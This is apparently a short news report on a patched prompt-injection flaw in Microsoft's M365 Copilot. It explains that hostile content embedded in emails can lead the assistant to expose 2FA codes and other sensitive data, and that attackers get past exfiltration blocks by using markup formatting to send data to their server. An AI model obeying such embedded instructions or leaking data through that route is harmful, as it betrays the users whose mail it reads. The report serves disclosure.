Microsoft Addresses Critical Vulnerability in M365 Copilot AI Platform

On June 13, 2026, Microsoft released a patch for a critical vulnerability in its M365 Copilot AI platform. Researchers who identified the vulnerability disclosed that their proof-of-concept exploit could access two-factor authentication (2FA) codes and other sensitive information from emails that are accessible to Copilot. The vulnerability arises because AI systems struggle to differentiate between legitimate user instructions and malicious content embedded within third-party material. As a result, Microsoft and other large language model (LLM) providers have implemented complex and temporary measures to mitigate the risks associated with this issue. One such measure prevents Copilot and similar LLMs from submitting web forms or sending emails that could facilitate data exfiltration. However, attackers have found ways to bypass these safeguards by using markup language to format text, which allows sensitive data to be sent to an attacker's server.